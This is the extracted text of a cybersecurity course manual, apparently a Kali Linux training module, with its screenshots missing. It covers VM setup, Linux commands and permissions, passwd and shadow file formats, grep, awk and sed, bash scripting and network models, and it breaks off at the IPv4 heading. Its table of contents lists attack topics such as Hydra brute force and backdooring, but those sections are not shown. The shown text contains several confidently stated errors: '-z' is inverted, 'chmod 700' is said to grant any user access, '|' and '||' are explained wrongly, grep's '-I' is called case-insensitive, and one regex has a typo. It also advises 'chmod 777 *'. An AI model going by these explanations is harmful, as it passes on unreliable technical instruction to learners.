Page|1
Network Research
NX201
2|Page
Table of Contents
Module 1: Virtualization ................................................................................................... 4
Virtualization ........................................................................................................................... 4
Installing Workstation on a Windows Host.................................................................................................... 4
Installing Kali Linux......................................................................................................................................... 8
Bridged vs. NAT ............................................................................................................................................ 15
Module 2: Introduction to Linux ...................................................................................... 19
Working with Linux ................................................................................................................ 19
Linux Directories .......................................................................................................................................... 19
Linux and Basic Commands .......................................................................................................................... 20
Operators in Linux ........................................................................................................................................ 20
Commands in APT package (Advanced Package Tool) ................................................................................. 21
Linux Users ................................................................................................................................................... 22
File Permissions in Linux .............................................................................................................................. 25
Module 3: Text Manipulation.......................................................................................... 31
Loops - For and While .................................................................................................................................. 47
Bash Scripting and Automation ................................................................................................................... 52
Practical Lab ................................................................................................................................................. 57
Module 4: Protocols and Services .................................................................................... 63
TCP/IP and OSI Model ............................................................................................................ 63
TCP/IP Model ............................................................................................................................................... 64
Using the Internet - Basic Concepts ............................................................................................................. 66
Remote Connection Protocols ..................................................................................................................... 69
IPv4 .............................................................................................................................................................. 69
Protocols and Services ............................................................................................................ 71
DNS .............................................................................................................................................................. 71
Important Protocols ..................................................................................................................................... 72
Introduction to Scanning ............................................................................................................................. 73
Scanning with Nmap .................................................................................................................................... 73
Scanning with Shodan .................................................................................................................................. 75
Brute-Force .................................................................................................................................................. 79
Offline Brute Force: Shadow file .................................................................................................................. 81
Online Brute-Force: Hydra ........................................................................................................................... 84
Practical Lab ................................................................................................................................................. 86
Module 5: Diving into Packets......................................................................................... 93
Wireshark .............................................................................................................................. 93
Non-Secure and Secure Packets .................................................................................................................. 94
Filtering and Parsing .................................................................................................................................... 96
Extracting Objects ...................................................................................................................................... 100
Practical Lab ............................................................................................................................................... 101
Module 6: Windows Network Tools .............................................................................. 107
Module 7: Local Network Attacks ................................................................................. 113
MiTM .......................................................................................................................................................... 113
LLMNR Attacks ........................................................................................................................................... 115
Practical Lab ............................................................................................................................................... 117
Page|3
Cyber Attack Practice ........................................................................................................... 123
Backdooring ............................................................................................................................................... 123
Practical Lab ............................................................................................................................................... 127
4|Page
Module 1: Virtualization
Virtualization
Installing Workstation on a Windows Host
Log on to the Microsoft Windows host as an administrator user. If installing from a CD, choose Run
from the Start menu and enter D:\setup.exe, where D: is the drive letter for the CD-ROM drive. If you
are installing from a downloaded file, choose Run from the Start menu, browse to the directory where
you saved the downloaded installer file, and run the installer. (the filename is
VMwareWorkstation.exe). Click Next to dismiss the welcome dialog box.
Acknowledge the end-user license agreement.
Page|5
Select I Accept the terms in the License Agreement option, then click Next. Choose the directory in
which to install VMware Workstation.
To install it in another directory, then the default, click Change, and browse to the directory of choice.
If the directory does not exist, the installer creates the directory for you. Click Next. User Experience
Settings. Select check for updates and press Next.
6|Page
Application Shortcuts preference. Select where to place the shortcuts on the system.
Click Install to begin the installation.
Page|7
Click Finish to complete the installation process.
Launch VMware Workstation. Double click on the icon on the desktop to launch the application.
8|Page
Installing Kali Linux
Click file -> New virtual machine or Create a New Virtual Machine.
Select Custom.
Page|9
Choose the virtual machine hardware compatibility. The Workstation 14.x format should be selected
for better compatibility in possible migration.
Select the installer disk image file for operating system installation, then click Next.
10 | P a g e
Select Linux as a Guest operating system and click Next.
Specify the VM name and location, or leave it default.
P a g e | 11
Specify the number of processors and the number of cores per processor for this virtual machine.
Using 1 CPU is enough for Kali Linux.
Set the Kali Linux with 2GB of memory.
12 | P a g e
Select Network type; choose NAT.
Select a disk. Click Create a new virtual disk and then click Next.
P a g e | 13
Select Store virtual disk as a single file if there are no limitations to the file system.
Specify where you want to store the virtual disk file, and click Next.
14 | P a g e
Select Customize hardware if necessary, and click Finish to create the VM.
P a g e | 15
Bridged vs. NAT
The host's network adapter connects the virtual machine to the local network in a bridged network,
like adding another device. The virtual machine receives a separate IP address from the DHCP of the
local network.
NAT Network Address translation is like opening a separate network to control who is inside the
network. The virtual machines inside still have access to the outside network. However, all the traffic
is masked as if it's coming from the host itself.
As its name suggests, host-only, this network configuration allows the virtual machines to
communicate with the host and don't have access to the network or each other.
Category
Bridged network
NAT network
VM -> Host
+
+
VM <- Host
+
(only with port forward)
VM1 <-> VM2
+
+
VM -> Internet
+
+
VM <- Internet
+
(only with port forward)
16 | P a g e
Changing the connection type from NAT to Bridged by entering Settings. A bridged connection
connects directly to the physical network rather than the NAT connection, shared with the VM host's
IP address (new subnet).
The IP address is 192.168.1.234, and it's connected directly to the physical network.
P a g e | 17
Changing Back to NAT connection.
Checking the internal IP address in the Linux machine after we changed to NAT connection. The
internal IP address is 192.168.221.172, with a new sub-network shared with the VM host.
18 | P a g e
Take a snapshot of the system by Navigating to VM -> Snapshot -> Take Snapshot, or by clicking on
the symbol. The snapshot feature gives us the ability to back up the system quickly.
The new IP address is 192.168.172.129.
P a g e | 19
Module 2: Introduction to Linux
Working with Linux
The terminal is a window you get when you open the command line interpreter. Inside the terminal,
you have the shell related to the specific language it supports. In Kali Linux, the terminal supports
bash, python, and others.
Shell
The shell is the command interpreter in an operating system such as Unix or GNU/Linux; it is a
program that executes other programs. It provides a computer using a Unix/GNU Linux system
interface to run different commands or utilities/tools with input data. When the shell has finished
executing a program, it sends an output to the screen's user, the standard output device.
The Terminal-Emulator Concept
A terminal emulator is a tool that allows us to emulate a shell while running commands and launching
tools from the graphical environment. Each distribution has its way of opening the Terminal Emulator.
Linux Directories
/ - That is the root folder of the system. Everything on Linux is located under that directory.
/bin - This directory stores Linux commands (such as ping, ls, cp, and more) used by all users.
/dev - Driver, hardware, and system files.
/var - This directory contains files predicted to change in size and content while the systems run, like
log files.
/etc - This directory contains different settings/configurations of the OS.
/lib - Directory containing libraries (shared code between applications so they could run) for critical
software from /bin folder.
/boot - This directory contains files needed for the system activation.
/tmp - Directory containing temporary files; these files get deleted once the system is turned off and
restarted; in general, they disappear after a few days.
/usr - Directory containing applications and information for users to access and operate.
/home - The personal folder of each user.
/srv - This directory contains data for system-provided services.
20 | P a g e
Linux and Basic Commands
ls
cd
cd ..
cd /
cd ~
history
passwd
touch
nano
cat Filename
cp A B
mv A B
clear
pwd
echo "hello"
rm -rf A
locate
reboot
poweroff
man A
uptime
whoami
sort A
head
tail
nl
ping
netstat -tapn
ifconfig
chmod
grep
displays the folder content. The command ls -a shows hidden files (with '.' for the first
character). The command ls -l show each file's information, such as size, permissions,
and a line for each file
change folder
one folder back
move to root folder
move to the home folder of the user
command history of the use
change user password
creates an empty file
file editor
displays file content
copies file A to location B
moves file A to location B. It can be used to rename the file
clears the terminal screen
prints the full pathname of the current working directory
creates output 'hello'
removes folder A
search a file in the database, make sure to update the index beforehand
restart the OS without confirmation or warning
shut down the OS without confirmation or warning
extended guide for the "A" command
shows the overall time the system is on
shows the currently connected user
displays sorted lines in file "A" alphabetically
display the first ten lines of the file
displays ten last lines of a file
displays file content with numbered lines
same as in Windows used to check the communication between computers
displays information on active connection on computer
displays the local net card details, including the internal IP address
changes permissions for the file, to grant full permissions to all users and all files in a
directory we are in, type: chmod 777 *
displays lines where the desired text is located
Operators in Linux
Operators come after a command - to save, filter output, or perform more than one command
simultaneously.
>
saves the output into a file and deletes current content if it exists
>>
adds output to the end of the file
&&
executes the first command if successful executes 2nd command
;
executes the first command and, in any case, executes 2nd command
|
pipeline - Afterwards, follow commands executed on the original output before it, such as a
filter
P a g e | 21
Commands in APT package (Advanced Package Tool)
apt-get update
apt-get upgrade
apt-get dist-upgrade
apt-get install PACKAGE
apt-get remove PACKAGE
apt-cache show PACKAGE
updates install packages from configured servers.
updates the installed packages.
performs system updates.
install package.
removes package.
displays the description of a package.
Before using apt-get, a download source must be set up. Otherwise, the system won't know where to
get files from otherwise. If needed, edit the file /etc/apt/sources.list (this is the link the OS goes to
get files and updates) and add relevant sources. Each package in Linux has a link saved in the index.
When we update Linux, more links and existing packages update as well. The /etc/apt/sources.list file
contains Linux sources. Every update, the system goes to these links and updates. It is, therefore,
important to check that the sources are up to date.
22 | P a g e
Linux Users
Linux is a multiuser operating system. A typical administration task in a multiuser environment is
creating new users, modifying existing users, or removing users. For ease of access management, users
are assigned to groups. Creating, deleting, and changing groups is another common administration
task.
In a typical Linux system, users aren't allowed to execute commands. For that, we have the sudo
command, which allows for full permission and privileges in a specific and temporary manner. The
root is the Admin/Superuser full privileges account that does not require the sudo command to
execute administrator-only commands, such as the reboot command. The sudoers (in /etc/sudoers)
contain users who can use the command sudo for special permission. The sudo packages come with
an automatic tool for editing and testing the sudoers file; the commands are: visudo
Understanding the sudoers file configurations
•
•
•
Defaults env_reset - resets the terminal environment after switching to root
root ALL=(ALL) ALL - allows root to do everything on any machine as any user
%admin ALL=(ALL) ALL - allows anybody in the admin group to run anything as any user
P a g e | 23
User Commands
Add a user with the command adduser newuser. By default, a new user is assigned to a new temporary
group with his name.
A user can be given sudo privileges by being added to the sudo group or the sudoers file if we want to
add a user to a group.
usermod -a -G <group> <username>
In this case: usermod -a -G sudo newuser
To set the user's primary group, use the -g flag instead of the -G.
usermod -a -g sudo newuser
To create a new group, use the command: groupadd <newgroup>
And to remove an existing group: groupdel <group>
Passwd File
The passwd file located at /etc/passwd/ The file is a text file containing the attributes of each user or
account on a Linux computer.
The permissions for /etc/passwd are by default setting so that it is world-readable, that is, so that any
user on the system can read it. The file can easily read using a text editor or with a command such as
cat, which is commonly used to read files, i.e.
The /etc/passwd contains one entry per line for each user (user account) system. All fields are
separated by a colon (:) symbol.
1. Username: The username for login. It should be between 1 and 32 characters in length.
In this case: the username is root.
2. Password: An x character indicates that the encrypted password is stored in the /etc/shadow file.
In this case: The password is stored in the shadow file.
3. User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) reserved for root and UIDs
1-99 reserved for other predefined accounts. Further, UID 100-999 is reserved by the system for
administrative and system accounts/groups.
In this case: Since the user is the root, the UID is 0.
24 | P a g e
4. Group ID (GID): The primary group ID (stored in /etc/group file), same as the UID, the GID 0
reserved for the root group.
In this case: The group is 0.
5. User ID Info: The comment field. It allows adding extra information about the users, such as the
user's full name, phone number, etc.
In this case: By default, it says the username.
6. Home directory: The absolute path to the directory the user be in when they log in. If this
directory does not exist, then the user's directory becomes.
In this case: The user home folder is /root.
7. Command/shell: The absolute path of a command or shell (/bin/bash). Typically, this is a shell.
Shadow File
The /etc/shadow file stores the actual password in an encrypted format (more like the password's
hash) for the user's account with additional user password properties. All fields are separated by a
colon (:) symbol. It contains one entry per line for each user listed in the /etc/passwd file.
1. Username: The login username.
2. Password: The encrypted password. The password can include special characters, digits, lower
case alphabetic, and more. Usually, the password format is set to $type$salt$hashed. The types
that are used on GNU/Linux are as follows:
a. $1$ is MD5
b. $2a$ is Blowfish
c. $2y$ is Blowfish
d. $5$ is SHA-256
e. $6$ is SHA-512
3. Last password change (last changed): Days since Jan 1, 1970, that password was last changed.
4. Minimum: The minimum number of days required between password changes, i.e., the number
of days left before the user can change their password.
5. Maximum: The maximum number of days the password is valid (after that user is forced to
change their password).
6. Warn The number of days before the password expires that the user warned that their password
must be changed.
7. Inactive: The number of days after a password expires that the account is disabled.
8. Expire: days since Jan 1, 1970, that account is disabled.
P a g e | 25
File Permissions in Linux
Every file and directory in Unix/Linux system is assigned three types of owner.
User
A user is the owner of the file. By default, the person who created a file becomes its owner. Hence, a
user is sometimes called an owner.
Group
A user- group can contain multiple users. All users belonging to a group have the same access
permissions to the file. Suppose you have a project where several people require access to a file.
Instead of manually assigning permissions to each user, you could add all users to a group and assign
group permission to the file. These group members and no one else can read or modify the files.
Other
Any other user who has access to a file. This person has neither created the file nor belongs to a user
group that could own the file. Practically, it means everybody else. Hence, when you set permission
for others, it is referred to as set permissions for the world. To see permissions of files and information
in a more detailed way, type ls -l
Additionally, execute the same command for a specific file using ls -l FILENAME.
26 | P a g e
'-rw-r--r-permissions given to the owner, user group, and others. The first '-' implies that we
have selected a file.txt.
If it were a directory, the character d is displayed.
•
•
•
Read the file
Write or edit the file
Can't execute the file since the execute is set to '-'
P a g e | 27
Users, Group, Others
chmod
To change a user-mode use the chmod command.
chmod <option> file/folder
Each user can have different permissions for a file.
x
executes
r
read
w
writes
Absolute (Numeric) Mode
Permission Type
Execute
Write
Execute + Write
Read
Read + Execute
Read + Write
Read + Write + Execute
Symbol
x
w
x+w
r
r+x
r+w
r+w+x
Numeric
1
2
1+2
4
4+1
4+2
4+2+1
Understanding file permissions by three-digit octal number.
Number
1
2
3
4
5
6
7
28 | P a g e
Symbolic Mode
In the Absolute mode, you change permissions for all three owners. Use the symbolic mode to modify
the permissions of a specific owner. It makes use of mathematical symbols to modify the file
permissions.
Operator
+
=
Description
Adds permission to a file directory
Remove permission
Sets the permission and overrides the permissions set earlier
User Denotations
u
g
o
a
Ownership
user/owner
group
other
all
Changing Ownership and Group
For changing the ownership of a file/directory, use the chown command.
To change the user and the group for a file or directory, use the command:
chown <user:group> filename
P a g e | 29
File Commands
cp - used to copy files and directories.
Change the name of the file using cp.
A wildcard is used to copy multiple files.
mv - used to move files from one location to another.
rm - deletes files.
30 | P a g e
cd - traversing to a specified directory.
touch - creates an empty file.
pwd - prints the current directory.
ls - lists all files and directories in the current location.
mkdir - creates a directory.
P a g e | 31
Module 3: Text Manipulation
Grep
The grep command is a UNIX command utility that can use to find specific patterns.
Grep Command-line Flags/Options
Furthermore, the grep command has a few key flags/options. Specify the -I flag to a case-insensitive
match.
The "before" and "after" flags. By default, the grep command displays the line with the successful
match. Use the "-A, -B, -C" flags to see lines before or after.
-A
print the number of lines after the match.
-B
print the number of lines before the match.
-C
print the number of lines in both directions of the match.
32 | P a g e
Awk
The awk command breaks each line of input passed to it into fields. By default, a field is a string of
consecutive characters delimited by whitespace, though there are options for changing this.
awk '{ print $3 }' file.txt or cat awk '{ print $3 }' file.txt
Filter multiple columns using a custom delimiter between.
P a g e | 33
Sed
The sed command in UNIX can function like searching, find and replace, insertion or deletion.
Here the "s" specifies the substitution operation. The "/" are delimiters. The "world" is the search
pattern, and the "earth" is the replacement string.
Word Count
Print newline, word, and byte count for each FILE and a whole line if more than one FILE is specified.
-c
print the byte counts
-m
print the character counts
-l
print the newline counts
-w
print the word counts
Count the number of lines in the file using the -l flag.
Count the number of words using the -w flag.
34 | P a g e
Count the number of characters in the file.
Sort and Uniq
The UNIX commands sort and uniq to order and manipulate data in text files. The sort command
accepts input from a text file or standard output, sorts the input by line, and outputs it. The sort
command sorts the given input alphabetically and numerically, prioritizing any given number by
default.
Running the sort command.
P a g e | 35
The uniq command takes input and removes repeated lines. Because uniq removes identical adjacent
lines, it is often used in conjunction with the sort command to remove non-adjacent duplicate lines.
cat file.txt | sort -n | uniq -c
This combination sorts the input and then counts the repeating occurrences.
Cut
The cut command in UNIX is a command for cutting out the sections from each line of files and writing
the result to standard output. The basic usage of the cut command is cutting input by selecting specific
fields. To choose a field, use the -f flag.
Cut uses tab as a default field delimiter but can work with another delimiter using the -d option.
36 | P a g e
Adding the sed command with -d and -f flags.
P a g e | 37
Head and Tail
The head command outputs the first part of the files, and the tail command is used to output the last
part of the files. By default, the head and tail commands display the first or last ten lines from the file.
Specify the number of lines to display from the beginning of the file or the end; use the -n flag.
At the Linux command line, you often need to view files or portions of them. Besides, you may need
to employ tools that allow you to gather data chunks or file statistics for troubleshooting or analysis
purposes. The utilities in this section can assist in all these activities.
Text Combining Commands
Putting together small text files for viewing on the screen and comparing them is useful. The command
covered do that. The paste is a command that allows the merging of lines of files horizontally. Its
outputs lines consist of each file's corresponding lines specified as an argument, separated by tabs.
The cat command displays the entire text file. The users and password file separately and display them
side-by-side, and you do not care how sloppy the output is. Like school glue, it glues them together,
but the result is not necessarily pretty.
38 | P a g e
tr
tr stands for translate. It is a command-line utility that translates or deletes specific characters. It
supports a wide range of transformations and can use with piping for even more advanced filtering.
Use tr to modify the output to a specific need.
Delete a single character or range of characters.
P a g e | 39
Use the -s flag to squeeze repetitive characters into one.
Use the "." to split the text.
Using the flag -t, replace set1 with set2.
40 | P a g e
Basic and Extended Regular Expressions
"A regular expression or regex … is a sequence of characters that define a search pattern."
In Bash, write a single-line search query in any input and almost all basic filtering commands, such as
grep awk, sed, cut, etc.
Regex in Grep
First most all, the name grep stands for "global regular expression print". This means that grep can see
if the input it receives matches a specified pattern. The command grep has the useable extended
regular expressions. Use the -E flag or the egrep command (same thing) to use these extended regular
expressions.
Grep - Anchor Matches
Anchors are special characters that specify where a match must occur to be valid in the line. The first
ones are the "^" and the "$" anchors. The "^" anchor stands for anything starting with a particular
pattern.
Use the syntax to filter each string that begins with the letter "w".
In contrast, filter any string that ends with the letter "e" using the "$" anchor.
P a g e | 41
Another useful anchor is the "*", which means repeating the previous character or expression zero or
more times.
Filter any string with zero or more of the string "ap" and then "le".
Placing a group of characters within brackets specifies that the character can be anyone character
found within the bracket group. The first method is "[abn]" - Meaning that any character is filtered.
42 | P a g e
The second method is "[a-c]" – filtering any character in a range.
A great example of using grouping is to detect IPs.
Then, use sort and uniq commands to filter the repeating IP addresses.
Grep - Times
This regex is used to find a match that repeats more than one. The first one is "\{n\}", which is used to
filter strings that repeat "n" times exactly.
The grep command matched the number "1", repeated twice. Furthermore, use the expression
"\{n,m\}", which matches any string from n to m times.
P a g e | 43
Grep - Special Expressions
In grep, the '\' character (backslash) takes a special meaning when followed by certain ordinary
characters.
"\s"
White Space
"\S"
non-White Space
"\d"
digit character
"\D" non-digit character
"\w" Word
"\W" non-Word (punctuation, spaces)
Regex in Awk, Sed, and Cut
Like the grep command, a few other commands have a unique Extended Regular Expression.
Like the grep command, the awk command can filter a specific pattern; what is unique is specifying a
specific column. It is worth mentioning that the command sed is capable of pattern matching.
Like the grep command anchors, the same characters can be used in the commands awk and sed.
Filter any IP address starting with "172" use ^.
44 | P a g e
Or any IP address that ends with the number "2".
The awk command receives a range of numbers.
Special Character Classes
[[:alpha:]]
Pattern for any alphabetical character, either upper or lower case.
[[:alnum:]]
Pattern for 0-9, A-Z, or a-z.
[[:blank:]]
Pattern for space or tab.
[[:digit:]]
Pattern for 0 to 9.
[[:lower:]]
Pattern for a-z lower case.
[[:print:]]
Pattern for any printable character.
[[:punct:]]
Pattern for any punctuation character.
[[:space:]]
Pattern for any whitespace character: space, Tab, NL, FF, VT, CR.
[[:upper:]]
Pattern for A-Z upper case.
Streams, Redirection, and Pipes
Data streams are the raw materials that command-line tools and Linux utilities use to receive and send
data.
Stdin (0) - this is the stream that programs use to read input data. For example, the commands dir and
ls can use command-line arguments, but they work without stream data input.
Stdout (1) - this is the stream to which programs output their data. The best example is the command
cat. When you give it a file, it prints the files in contact with the user's screen to see.
Stderr (2) - this is the stream program used when there is an error. It's printed on the screen like
stdout for diagnostics and troubleshooting.
P a g e | 45
Redirection
The redirect capabilities give you a handy toolbox to accomplish tasks faster and improve productivity.
>
overwrite
>>
append
Save the ifconfig output into a file.
What happens when we do > again?
The file content was overwritten; to add text, use >>.
46 | P a g e
Pipes
A pipe is a form of redirection used in Linux and other Unix-like operating systems to send the output
of one command/program/process to another command/program/process for further processing. For
example, read a file's content and then utilize one of the text manipulation tools we learned before.
The Linux pipe is the character: |
Search for IP addresses starting with 192.
The difference between | and ||
| - (condition 1 | condition 2): checks both cases even if case 1 is true
|| - (condition 1 || condition 2): doesn't bother to check the second case if the first one is true
P a g e | 47
Loops - For and While
Loops in Bash allow us to take a series of commands and re-run them until a situation is reached. They
are useful for automating repetitive tasks.
For
The first common loop is for. The for loop command runs over each of the items in each list. Besides,
perform the given set of commands.
The for loop take each item in the list (in order, one after the other), assign that item as the value of
the variable var, execute the commands between do and done, then go back to the top, grab the next
item in the list and repeat over. For example, use the output of the command ls as the list and then
echo the var as it gets the output of each line.
48 | P a g e
The "for" command can process a series of numbers.
Or,
P a g e | 49
While
The second typical loop is the while loop. While the expression is true, it keeps executing these lines
of code.
50 | P a g e
Working with Logs
For this example, use the commands we spoke about earlier in this chapter and implement them on a
basic auth.log log file downloaded from the internet for educational purposes.
To parse the IP addresses, use regular expressions since IPs have a repeating pattern.
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[05]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" auth.log.1
-E allows us to use extended regular expressions.
-o showing matching results
The next numbers validate that the file's IP addresses are valid and fit an actual IP address template
and not go over 255.
We have had the same address several times, and we don't need that in the log file. Filter this address
using the command uniq -c.
P a g e | 51
Now, each IP address shows up once, and it counts each occurrence of every IP address. Sort the list
from the smallest number to the largest using sort -n.
Now, no duplicates; save the output to a new file.
52 | P a g e
Bash Scripting and Automation
Bash (Bourne Again Shell) is a command shell that exists primarily in Linux operating systems. A shell
script is a fully-fledged programming language in itself. It can define variables functions and do
conditional execution of shell commands.
Start with creating an empty file for the first bash script running nano firstscript.sh
use "Shebang" to fully use the shell features and ensure that the shell interprets the commands. The
"Shebang" (or the "bang line") is the first line of any bash script, and it looks as follows:
#!interpreter [arguments]
Interpreter is the full path to a binary file (ex: /bin/sh, /bin/bash) and the arguments are optional.
Without this line, the script is launched via the shell from which the script was called; for example, if
we wrote a script based on Bash shell features, but the user runs the script from ksh shell, the script
run as a ksh shell script, and therefore the script not work.
#!/bin/bash
Any executable (runnable) file in the Linux environment must have the appropriate executable
permissions; allow any user to read, write, and execute the script.
chmod 700 firstscript.sh
Variables
A variable is a character string to which we assign a value. The value assigned could be a number, text,
filename, device, or other data type. A variable is nothing more than a pointer to the actual data. The
shell enables you to create, assign, and delete variables. The name of a variable can contain letters (a
to z or A to Z), numbers (0 to 9), or the underscore character (_).
Unlike many other programming languages, Bash does not segregate its variables by "type"; therefore,
any declared variable is considered a "character string" used according to its context.
To access the value stored in a variable, type the variable name prefixed with a dollar sign ($); for
example, in the previous demonstration, we set a variable named var and gave it a value of "value".
P a g e | 53
Conditions - The IF Conditions
With the IF condition, if a specific condition is true, then something happens.
If the condition is not valid, using the else command, specify what happened.
Furthermore, we could tell the interpreter to test another condition if the first condition is false using
the elif statement (stands for else if).
Syntax: if [ $<var> -eq/-ne/-lt/-le/-gt/-ge <number> ]
-eq
Equals
-ne
Not equals
-lt
Less then
-le
Less or equal
-gt
Greater than
-ge
Greater or equal
54 | P a g e
-f
-d
-z
True if FILE exists
True if DIRECTORY exists
True if VAR is non-empty
In this example, we check if the variable "var1" exists; if it does exist, test if it's bigger than five or
smaller.
P a g e | 55
Loops
More practical usage of while are infinity loops; this loop can keep a script running until a condition
happens or the user requests to exit (via a menu with an existing button). To create an infinite loop,
we must state an always true condition; an example is the statement "true".
56 | P a g e
Functions
To perform repetitive tasks, use functions.
To call the function, type its name.
Define a function that accepts parameters while calling the function. These parameters are
represented by $1, $2, and so on, or a $@, which stands for all given parameters.
P a g e | 57
Practical Lab
Ifconfig
Enter the terminal in the Linux Kali and enter the command ifconfig.
The grep command filter and show the line that contains the phrase.
With the grep command, filter by the phrase broadcast.
The awk command filter show the specified column.
With the awk command, filter by the second column representing the internal IP address.
The new command with the filters applies is: ifconfig | grep broadcast | awk '{print $2}'
grep - filters the line with the chars "broadcast"
$2 - in awk command represents the second column we are filtering
The result is a clean output with the internal IP address.
58 | P a g e
Route
Enter the terminal in the Linux Kali and enter the command route -n. The route command gives us the
option to view the router's IP address (default gateway).
-n
used to get the IP address and not the name it tries to resolve
Using the -n flag, is receiving the IP address: 192.168.1.1
Now, apply the same technique we used to filter the internal IP address to filter the router IP address
from the rest of the output. Filter by the grep with the phrase UG and the awk command to filter the
second column, as we did with the internal IP address.
The command is the route -n | grep UG | awk '{print $2}'
P a g e | 59
Whois
The whois command's purpose is to give us IP addresses or domains information. We use this
command to gain more information regarding the target IP address, such as country location/service
provider.
60 | P a g e
Sed
To filter the country in the output, apply the sed filter command.
▪
▪
▪
▪
▪
sed - is used to filter specific chars, lines, etc
The flag -e gives the ability to filter particular lines in the output
The '4,4!d' is used to filter everything but line four in the output
grep is used to filter the lines that contain addresses
awk is used to filter the specific column
Wc
To see the number of lines the text file contains, use the command wc.
wc stands for Word Count and is mainly used for counting purposes.
-l
count the number of lines in the file
To see the number of words the text file contains, use the -m flag.
To print the file content, use the cat command with the grep command to filter the lines containing
the word 'root'.
P a g e | 61
The wc command is added to the previous command to give the option to count the number of lines
the word 'root' appears.
Use the sed command to replace every "e" letter in the file with the letter "x" and save it to a new file.
s
stands for switch
g
stands for a global substitute for the entire file and not the first line
Save the new modified output to a new file.
62 | P a g e
To print the first ten lines of the file, use the head command with the -n flag.
head used to print the top N lines data of any given output. By default, the head command is set
for the top ten lines.
-n
used to choose the number of lines from the top to print.
tail
used to print the 'N' lines of the given output at the bottom of the file. By default, the head
command is set for the ten lines.
-n
used to choose the number of lines from the bottom to print.
P a g e | 63
Module 4: Protocols and Services
TCP/IP and OSI Model
The OSI model shows the various actions required to transfer data over the communication network
and arrange multiple operations.
1
2
3
4
5
6
7
Application
Presentation
Session
Transport
Network
Data Link
Physical
Application Layer - This layer is displayed to the end-user (a regular user with computer access). This
layer allows access to network resources.
Presentation Layer - This is the layer in which the operating system operates with the data. The main
functions of this layer include translation, encryption, and compression of data. A user interacts with
the application layer, which sends the data down to the presentation layer.
Session Layer - This layer maintains proper communication by establishing, managing, and terminating
sessions between two computers. For example, whenever we visit any website, the computer must
create a session with the web server hosting that site.
Transport Layer - This layer has a critical job. It decides how much information should send at a time.
So, when you communicate with a website, this layer chooses how much data is transferred and
received at a given time. This layer provides a reliable process to process message delivery and error
recovery.
Network Layer - The main job is to move packets from source to destination and provide internetworking. The network layer is the layer that the routers operate. Since routers operate at the
network level, the IP address is at the network level.
Data Link Layer - This layer is responsible for organizing frames and ensuring hop to hop delivery. It is
the layer on which the switches operate. Since routers operate at the network level, the MAC address
resides at the data link layer. All the computers in a specific network get plugged into a switch to
communicate with each other.
Physical Layer - This is the layer on which the real transmission of data bits occurs through a medium.
This layer is, as the name suggests, all the physical stuff that connects the computers.
64 | P a g e
TCP/IP Model
TCP/IP model specifies how devices should transfer data over the internet to one another. The two
main protocols are TCP, which defines how applications create communication channels and
managing how data should break down into packets before being transmitted over the internet. IP
defines how to address and route packets for delivery.
Application Layer - The Application Layer consists of various protocols that perform all the OSI model's
Application, Presentation, and Session layers. This includes interaction with the application, data
translation and encoding, dialogue control, and coordination between systems. Such protocols are
HTTP, SMTP, NTP, SSH, and many more.
Transport Layer - This layer is like the transport layer of the OSI model. It is responsible for end-to-end
communication and delivery of data.
•
TCP: transmission control protocol is the reliable communication protocol, using sequence
numbers to identify each packet and ensure they are sent and received correctly. A three-way
handshake secures the connection.
•
UDP: User Datagram Protocol is the opposite of TCP. It's unreliable. The packets send without
any order, packets can easily get lost on the way to the host or server, packets are checked
for integrity if they arrive, and the receiver cannot know the number of packets he was
supposed to get. Packets can send to the broadcast address, which undermines security.
Internet Layer - Once TCP/UDP has finished their job, they are sent to the internet layer. This layer's
primary goal is to ensure the packets arrive at their destination network by providing logical directions,
such as addressing, path determination, and forwarding.
•
IP: Internet Protocol. Responsible for sending packets from the source host to the destination
host by looking at the packet header.
P a g e | 65
•
ICMP: Internet control message protocol encapsulated inside IP datagrams and responsible
for reporting error messages. It could indicate the success or failure when connecting to a
remote IP address through router-to-router datagram transfer. It uses two types of messages:
ICMP test to determine if the destination is reachable, and ICMP reply, to check if the
destination host is responding or not.
•
ARP: Address resolution protocol requires finding the host's MAC address from a known IP
address using its table. Arp protocol uses two types of messages: ARP request, which sends a
request through the broadcast address and waits for a reply. ARP replied that all the network
devices received the request, but the recipient responded and added his physical address to
the cache memory and datagram header.
•
Network access layer: This layer combines the data link layer and physical layer of the OSI
model; this layer's primary goal is to define how to send the datagram through the network.
It carries functions like encapsulating the IP datagram into frames and mapping IP addresses
into physical addresses. The protocols used in this layer are ethernet, token ring, FDDI, x.25,
and frame relay.
66 | P a g e
Using the Internet - Basic Concepts
In the broad sense of the term, communication is transferring information or message. The process
can be done by two or more people, animals, computers, etc.
The relevant part of the use is communication between networking hardware - mainly between
communication networks, which we as human beings are in charge of operating. Sometimes directly
and other times via operating systems or automated software.
Hub
Network component that creates a network between computers.
Switch
Acts as a Smart Hub. Creates a network of computers, but unlike the Hub, the Switch transfers
information to a specific destination, a designated computer in the network. All computers are
connected to the network with a network interface controller.
P a g e | 67
Router
Network component, in charge of connecting networks. Responsible for routing the information
packets.
NIC
Network Interface Controller enables the computer or any networking hardware installed to connect
to a network.
WAN
Wide Area Network is a telecommunications network or computer network that extends over a
significant geographical distance. Able to connect several local networks or district networks.
LAN
Local Area Network, A local area network interconnects computers within a limited area such as a
residence, school, laboratory, university campus, or office building.
Packet
Formatted information package containing structured data carried by a communication network. The
packet is composed of a header, data, and a trailer. The header acts as the packet headline, containing
information regarding origin and destination. The data includes the content of the sent package the
actual data. The trailer is optional and marks the package's end; it contains information ensuring the
package reaches its destination without errors.
MAC Address
A unique, physical address stamped on every network hardware component at the time of production.
68 | P a g e
Octet
The name for each of the four numbers within an IP address. 8 characters in binary represent each
number - can be shown as a decimal (0-255) or as two digits in Hexadecimal base.
IP Address
A numerical label is a logical address used to ID devices connected to a communication network. These
addresses divide the web so that a hierarchy is formed, so it is possible to address one device in the
network rather than the whole network for sending a message or routing information.
Port
A process allows the software to transfer data represented in packets with a 16-digit binary number.
There are 65,536 ports for UDP (User Datagram Protocol) and 65,535 ports for TCP (Transmission
Control Protocol). Compare an IP address to a physical building; a port is the apartment number in
that scenario.
Protocol
The communications protocol is a procedure/collection of rules and guidelines defining requesting
and receiving data. Protocols are essential for enabling both sides (network devices) to understand
each other and provide services that can be received correctly by the other side.
Gateway
An IP address represents the path (gate) to external communication beyond the local network. In most
cases, the gateway's IP address be the router, enabling us to connect the local network to the global
internet.
IPv4
